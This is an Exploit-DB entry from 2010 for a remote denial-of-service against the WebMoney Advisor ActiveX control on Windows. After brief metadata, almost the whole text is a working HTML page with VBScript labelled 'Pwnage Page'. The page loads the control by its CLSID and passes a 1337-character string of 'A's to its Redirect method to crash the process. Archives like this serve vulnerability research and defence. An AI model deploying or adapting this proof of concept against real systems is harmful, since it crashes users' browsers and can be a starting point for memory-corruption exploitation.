Webmoney Advisor - ActiveX Remote Denial of Service

EDB-ID:

12431

CVE:

N/A

Author:

Go0o$E

Type:

dos

Platform:

Windows

Published:

2010-04-28

<html>
Pwnage Page
<object classid='clsid:3AFFD7F7-FD3D-4C9D-8F83-03296A1A8840' id='target' ></object>
<script language='vbscript'>

targetFile = "C:\Program Files\WebMoney Advisor\wmadvisor.dll"
prototype  = "Sub Redirect ( ByVal url As String )"
memberName = "Redirect"
progid     = "TOOLBAR3Lib.ToolbarObj"
argCount   = 1

arg1=String(1337, "A")
target.Redirect arg1 
</script>